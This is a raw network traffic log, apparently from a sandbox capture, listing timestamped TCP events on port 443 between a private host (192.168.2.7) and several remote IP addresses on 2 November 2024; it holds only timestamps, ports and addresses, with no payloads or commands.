Nov 2, 2024 17:56:49.554409027 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.554445982 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.554455996 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.554477930 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.554498911 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.554707050 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.555918932 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.555991888 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.556051016 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.556483984 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.556497097 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.556498051 CET	49898	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.556504011 CET	443	49898	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.556885004 CET	49886	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.556902885 CET	443	49886	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.571835995 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.571870089 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.571913958 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.571926117 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.571979046 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.571979046 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.572750092 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.572781086 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.572784901 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.572820902 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.572839022 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.572854042 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.572887897 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.572887897 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.572915077 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.572928905 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.572972059 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.573036909 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.574105024 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.574121952 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.574151993 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.574157953 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.574192047 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.574208021 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.574743032 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.574762106 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.574811935 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.574817896 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.574867964 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.574867964 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.605998039 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.606080055 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.606082916 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.606147051 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.616030931 CET	49894	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.616056919 CET	443	49894	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.686469078 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.686500072 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.686549902 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.686574936 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.686588049 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.686611891 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.692297935 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.692316055 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.692353010 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.692368984 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.692392111 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.692414045 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.692557096 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.692574024 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.692606926 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.692615032 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.692646980 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.692682028 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.776912928 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.776973963 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.777034998 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.777746916 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:49.777765036 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:49.780639887 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.780674934 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.780689955 CET	49899	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.780698061 CET	443	49899	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.794761896 CET	49910	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:49.794800043 CET	443	49910	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:49.795119047 CET	49910	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:49.795397997 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:49.795433998 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:49.795603037 CET	49910	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:49.795617104 CET	443	49910	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:49.795635939 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:49.795953989 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:49.795969009 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:49.796973944 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.797024012 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.797100067 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.800781965 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.800801039 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.802531004 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.802567959 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.802711010 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.803143978 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:49.803164005 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:49.810200930 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.810228109 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.810309887 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.810323954 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.810376883 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.810933113 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.810947895 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.811002016 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.811006069 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.811052084 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.811980009 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.811995029 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.812067032 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.812072992 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.812119961 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.929539919 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.929565907 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.929651022 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.929687023 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.929728985 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.930541039 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.930558920 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.930613995 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.930619955 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.930655003 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.971410036 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.971436024 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.971520901 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:49.971549034 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:49.971590042 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.048764944 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.048799992 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.048841000 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.048868895 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.048897028 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.048917055 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049305916 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049331903 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049376011 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049381018 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049415112 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049427986 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049434900 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049438953 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049484968 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049588919 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049617052 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049695969 CET	443	49889	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.049709082 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.049745083 CET	49889	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.079790115 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.079828024 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.079921961 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080260038 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080310106 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.080363989 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080543995 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080569983 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.080725908 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080739021 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.080746889 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080933094 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.080950975 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.081067085 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.081079006 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.097014904 CET	49917	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.097044945 CET	443	49917	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.097193003 CET	49917	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.097707033 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.097750902 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.097915888 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.098386049 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.098419905 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.098485947 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.098715067 CET	49917	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.098726988 CET	443	49917	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.099015951 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.099050045 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.099248886 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.099265099 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.172909021 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.172961950 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.173026085 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.173245907 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.173264027 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.180284023 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.181060076 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.181087017 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.181533098 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.181540966 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.237279892 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.258374929 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.258415937 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.259041071 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.259047031 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.263089895 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.263843060 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.263869047 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.264659882 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.264667034 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.313038111 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.313101053 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.313313007 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.314141035 CET	49903	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.314165115 CET	443	49903	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.317797899 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.317831039 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.317922115 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.374546051 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.374572039 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.390393019 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.390450954 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.390501022 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.390500069 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.390537977 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.393052101 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.393224955 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.393312931 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.395028114 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.395064116 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.395076990 CET	49904	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.395083904 CET	443	49904	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.395241976 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.395241976 CET	49908	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.395265102 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.395278931 CET	443	49908	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.409629107 CET	443	49910	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.410244942 CET	49910	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.410265923 CET	443	49910	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.410626888 CET	443	49910	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.427414894 CET	49910	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.427537918 CET	443	49910	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.433579922 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.433629036 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.433712006 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.434009075 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.447453022 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.447474003 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.449054003 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.449136972 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.484128952 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.484288931 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.509984016 CET	49910	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.535012960 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.548015118 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.548191071 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.560097933 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:50.613040924 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.613065004 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.613066912 CET	443	49911	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.613066912 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.613070965 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.613070965 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:50.703044891 CET	443	49917	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.703638077 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.703661919 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.711373091 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.711407900 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.711673021 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.711818933 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.711832047 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.715668917 CET	49911	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.753950119 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.753999949 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.754435062 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.754441023 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.754748106 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.754777908 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.755127907 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.755134106 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.755424976 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:50.755429983 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:50.755866051 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.755894899 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.755980015 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:50.755984068 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:50.756011009 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:50.756036997 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:50.756170034 CET	49917	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.756181002 CET	443	49917	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.756434917 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.757065058 CET	443	49917	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.760085106 CET	49917	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.760085106 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.760166883 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.760247946 CET	443	49917	23.221.22.205	192.168.2.7
Nov 2, 2024 17:56:50.763621092 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.811341047 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.820297956 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.820595026 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.820605993 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.822874069 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.822947979 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.823311090 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.823486090 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.823498011 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.824763060 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.825100899 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.825134993 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.826001883 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.826061964 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.826344967 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.826402903 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.826514006 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.827439070 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.827649117 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.827658892 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.828006029 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.830416918 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.830492020 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.830657959 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.859035969 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.859266043 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.859273911 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.859476089 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.859689951 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.859702110 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.860063076 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.860347986 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.860408068 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.861318111 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.861385107 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.861638069 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.861711025 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.861799955 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.861813068 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:50.861821890 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:50.861870050 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.861881018 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.864262104 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.864492893 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.864510059 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.865421057 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.865483999 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.865863085 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.865931034 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.866034031 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.866044044 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.867332935 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.867338896 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.871337891 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.882411003 CET	443	49913	13.107.246.45	192.168.2.7
